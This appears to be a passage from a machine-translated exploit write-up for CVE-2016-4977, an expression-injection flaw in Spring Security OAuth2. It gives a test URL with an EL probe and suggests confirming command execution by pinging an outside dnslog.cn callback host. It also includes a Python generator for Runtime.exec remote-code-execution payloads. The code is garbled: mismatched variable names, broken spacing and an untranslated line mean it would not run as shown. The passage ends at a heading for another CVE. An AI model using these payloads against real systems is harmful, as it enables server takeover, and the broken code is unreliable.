1.Spring Security OAuth2.0 (CVE-2016-4977)
This hole is due to Spring Security OAuth2.0 function, after the login is successful due to the absence of response_type show the presence of EL expressions injection vulnerability in the Whitelabel Error Page
Test Address: http://127.0.0.1:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
Basically using Spring Security OAuth2.0 is this the default path
Uncomfortable is that you must log in successfully, or directly on the authentication fails.
Look at execute the command "ping 0hb8tu.dnslog.cn"
生成little的脚本:
#! / Usr / bin / env python
message = input ( 'Enter message to ENCODE:')
shortly = $ {T (java.lang.Runtime) .getRuntime (). Exec (T (java. lang.Character) .toString (% s)% ord (message [0])
for ch message in [1:]
shortly + = '.concat (T (java.lang.Character) .toString (% s)) % ord (ch)
shortly + = ')}'
print (little)
Instructions:
Spring Data Rest Remote Command Execution Vulnerability (CVE-2017-8046)